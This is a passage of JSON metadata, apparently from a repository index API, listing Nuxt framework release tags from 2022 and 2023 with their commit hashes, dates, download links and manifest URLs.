xt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"@nuxt/ui-templates@1.1.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1/manifests"},{"name":"@nuxt/ui@0.4.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"@nuxt/ui-templates@1.1.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0/manifests"},{"name":"@nuxt/ui-assets@0.2.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0/manifests"},{"name":"@nuxt/ui@0.4.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"@nuxt/ui-templates@0.4.0","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.4.0/manifests"},{"name":"@nuxt/ui@0.3.3","sha":"3ba81f1e3a88bd38fd5e0ee52e152dcc8bfe1715","kind":"tag","published_at":"2022-09-20T07:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.3/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"@nuxt/ui-templates@0.3.3","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3/manifests"},{"name":"@nuxt/ui@0.3.2","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"@nuxt/ui-templates@0.3.2","sha":"dafb9ed0e436601b44a7dc8e6caa459314193ec7","kind":"tag","published_at":"2022-08-12T21:23:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"@nuxt/ui-templates@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1/manifests"},{"name":"@nuxt/ui@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"@nuxt/ui-templates@0.3.0","sha":"3623350feeb4b0ba4906611071430c7577440a75","kind":"tag","published_at":"2022-07-21T12:41:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0/manifests"},{"name":"@nuxt/ui-templates@0.2.2","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2/manifests"},{"name":"@nuxt/ui@0.3.0","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"@nuxt/ui-templates@0.2.1","sha":"1e0e83e29ac3633e299b9261c64122b360216200","kind":"tag","published_at":"2022-07-12T14:12:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1/manifests"},{"name":"@nuxt/ui-templates@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0/manifests"},{"name":"@nuxt/ui@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/t